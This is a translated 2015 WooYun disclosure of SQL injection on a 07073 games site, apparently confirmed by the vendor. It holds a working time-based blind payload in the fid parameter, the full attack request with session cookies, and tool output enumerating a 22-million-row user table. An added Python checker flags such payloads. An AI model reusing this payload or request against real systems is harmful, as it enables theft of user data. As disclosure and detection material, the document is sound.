
Vulnerability summary

Defect ID: wooyun-2015-0102069

Title: SQL injection on a 07073 Games site once again affects the data of 22040912 users

Vendor: 07073.com

Author: BMa

Submitted: 2015-03-18 09:40

Fixed: 2015-05-02 10:38

Published: 2015-05-02 10:38

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: Confirmed by vendor

Source: http://www.wooyun.org; for questions or help, contact [email protected]



Vulnerability details

Disclosure status:

2015-03-18: Details reported to the vendor, awaiting vendor action
2015-03-18: Vendor confirmed; details disclosed to the vendor only
2015-03-28: Details disclosed to core white hats and relevant domain experts
2015-04-07: Details disclosed to regular white hats
2015-04-17: Details disclosed to intern white hats
2015-05-02: Details disclosed to the public

Brief description:

Back at 07073 again: 22040912 user records in total; quite a few new users have been added over the past few days.
Whether they know me or not, everyone knows I never dump other people's databases without good reason.

Detailed description:

me.07073.com


POST /bar/unBindBar/ HTTP/1.1
Host: me.07073.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: CNZZDATA30095910=cnzz_eid%3D1437763485-1426487774-http%253A%252F%252Fwww.07073.com%252F%26ntime%3D1426633664; CNZZDATA30078424=cnzz_eid%3D1529681690-1426490357-http%253A%252F%252Fwww.07073.com%252F%26ntime%3D1426636241; Hm_lvt_bc27030a8a4ca522156896972fe911f9=1426501460,1426501610; gift_169551=PVGMKKQFNKUYGC; DedeUserID=22166706; DedeUserID__ckMd5=195d5f4d055945af; DedeUsername=bma123; DedeUsername__ckMd5=ed597bcceffae423; loginState=1; loginName=bma123; www07073=a%3A5%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%227dc5a977eb90e78961f8443615db3155%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A12%3A%22183.57.47.59%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A72%3A%22Mozilla%2F5.0+%28Windows+NT+6.1%3B+WOW64%3B+rv%3A36.0%29+Gecko%2F20100101+Firefox%2F36.0%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1426637627%3Bs%3A9%3A%22user_data%22%3Bs%3A0%3A%22%22%3B%7D5ad1b324fe917a886625fb4e3d2cc8ba; PHPSESSID=10f786029212f59d1a27744522eaebc2
X-Forwarded-For: 8.8.8.8
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 5
fid=1


Parameter: fid

[screenshot 1.jpg]

[screenshot 2.jpg]

[screenshot 3.jpg]

[screenshot 4.jpg]


Time-based injection: slow to run, but still workable. I enumerated all the databases and compared them with last time.

[screenshot 4.1.jpg]

Enumerating the tables of the current database:

[screenshot 5.jpg]

The database is the same as last time, so I went straight to the user table.

[screenshot 6.jpg]


Parameter: fid (POST)
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 OR time-based blind (SELECT)
Payload: fid=1' OR (SELECT * FROM (SELECT(SLEEP(5)))oqLu) AND 'Iwve'='Iwve
---
[09:28:34] [INFO] the back-end DBMS is MySQL
web server operating system: Windows 2003 or 7
back-end DBMS: MySQL 5.0.11
[09:28:34] [WARNING] time-based comparison requires larger statistical model, please wait..............................
[09:28:38] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors
22040912
Database: bbs073
+------------+----------+
| Table      | Entries  |
+------------+----------+
| uc_members | 22040912 |
+------------+----------+
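Added example, not part of the original report or the 07073 code base: a Python check that URL-decodes recorded POST bodies for /bar/unBindBar/ and flags a `fid` value that is not a plain numeric id or that carries a delay primitive such as the SLEEP() in the payload above. The sample bodies are constructed, and the rule that `fid` must be a positive integer is an assumption about the application.

```python
import re
from urllib.parse import parse_qs

# Constructed sample POST bodies as a server log or WAF might record them for
# /bar/unBindBar/: a normal unbind request, the time-based payload from the
# report (URL-encoded), and a BENCHMARK() variant of the same idea.
SAMPLE_BODIES = [
    "fid=1",
    "fid=1%27+OR+%28SELECT+%2A+FROM+%28SELECT%28SLEEP%285%29%29%29oqLu%29"
    "+AND+%27Iwve%27%3D%27Iwve",
    "fid=12%20AND%20BENCHMARK%285000000%2CMD5%281%29%29",
]

# Delay primitives (MySQL, PostgreSQL, MSSQL) used by time-based blind injection.
DELAY_PRIMITIVE = re.compile(r"\b(SLEEP|BENCHMARK|PG_SLEEP|WAITFOR)\b", re.IGNORECASE)


def fid_is_valid(value: str) -> bool:
    """Whitelist rule (assumption): fid is a positive integer id, nothing else.

    Enforcing this before the value reaches any query removes the injection
    point regardless of how the SQL statement is built.
    """
    return re.fullmatch(r"[1-9][0-9]{0,9}", value) is not None


def inspect_body(body: str) -> dict:
    """Decode one form body and return {param: [reasons]} for suspicious values."""
    findings = {}
    for name, values in parse_qs(body, keep_blank_values=True).items():
        for value in values:
            reasons = []
            if name == "fid" and not fid_is_valid(value):
                reasons.append("fid is not a numeric id")
            if DELAY_PRIMITIVE.search(value):
                reasons.append("time-based SQL primitive")
            if reasons:
                findings[name] = reasons
    return findings


def scan(bodies):
    """Return the indexes of bodies that produced at least one finding."""
    return [i for i, body in enumerate(bodies) if inspect_body(body)]


if __name__ == "__main__":
    for i in scan(SAMPLE_BODIES):
        print(i, SAMPLE_BODIES[i], inspect_body(SAMPLE_BODIES[i]))
```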

Proof of vulnerability:

Suggested fix:

Copyright notice: when reposting, please credit BMa@WooYun


Vendor response

Vendor response:

Severity: High

Vulnerability Rank: 20

Confirmed: 2015-03-18 10:36

Vendor reply:

Thank you for providing the vulnerability information.

Latest status:

None yet